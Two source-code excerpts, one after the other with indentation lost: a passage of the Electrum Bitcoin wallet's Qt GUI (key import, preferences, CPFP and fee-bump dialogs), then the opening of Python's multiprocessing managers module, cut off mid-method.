msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = repr(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
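        # Worked example (illustrative numbers only, not taken from the code above):
        # a 400-vbyte parent paying 400 sat (1 sat/vB) plus a 150-vbyte child, with a
        # target combined rate of 5 sat/vB (fee_per_kb = 5000), gives
        # 5000 * 550 / 1000 - 400 = 2350 sat for the child; the result is then
        # capped at max_fee and floored at total_size (~1 sat/vbyte overall).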
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
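        # E.g. an original rate of 10 sat/vbyte is pre-filled as max(15, 11) = 15,
        # while very low rates fall back to the old rate + 1 (illustrative numbers).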
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
managers.py
|
#
# Module providing manager classes for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token',
'SharedMemoryManager' ]
#
# Imports
#
import sys
import threading
import signal
import array
import queue
import time
import types
import os
from os import getpid
from traceback import format_exc
from . import connection
from .context import reduction, get_spawning_popen, ProcessError
from . import pool
from . import process
from . import util
from . import get_context
try:
from . import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tobytes())
reduction.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
if view_types[0] is not list: # only needed in Py3.0
def rebuild_as_list(obj):
return list, (list(obj),)
for view_type in view_types:
reduction.register(view_type, rebuild_as_list)
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely identify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return '%s(typeid=%r, address=%r, id=%r)' % \
(self.__class__.__name__, self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind in ('#TRACEBACK', '#UNSERIALIZABLE'):
if not isinstance(result, str):
raise TypeError(
"Result {0!r} (kind '{1}') type is {2}, not str".format(
result, kind, type(result)))
if kind == '#UNSERIALIZABLE':
return RemoteError('Unserializable message: %s\n' % result)
else:
return RemoteError(result)
else:
return ValueError('Unrecognized message type {!r}'.format(kind))
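#
# The wire format used by dispatch() above and by Server/BaseProxy below is a
# pickled request tuple (ident, methodname, args, kwds), answered by one of
# ('#RETURN', value), ('#PROXY', (exposed, token)), ('#ERROR', exception),
# ('#TRACEBACK', text) or ('#UNSERIALIZABLE', text).
#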
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
if not isinstance(authkey, bytes):
raise TypeError(
"Authkey {0!r} is type {1!s}, not bytes".format(
authkey, type(authkey)))
self.registry = registry
self.authkey = process.AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.id_to_local_proxy_obj = {}
self.mutex = threading.Lock()
def serve_forever(self):
'''
Run the server forever
'''
self.stop_event = threading.Event()
process.current_process()._manager_server = self
try:
accepter = threading.Thread(target=self.accepter)
accepter.daemon = True
accepter.start()
try:
while not self.stop_event.is_set():
self.stop_event.wait(1)
except (KeyboardInterrupt, SystemExit):
pass
finally:
if sys.stdout != sys.__stdout__: # what about stderr?
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.exit(0)
def accepter(self):
while True:
try:
c = self.listener.accept()
except OSError:
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
def handle_request(self, c):
'''
Handle a new connection
'''
funcname = result = request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
c.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop_event.is_set():
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
try:
obj, exposed, gettypeid = id_to_obj[ident]
except KeyError as ke:
try:
obj, exposed, gettypeid = \
self.id_to_local_proxy_obj[ident]
except KeyError:
raise ke
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as e:
msg = ('#ERROR', e)
else:
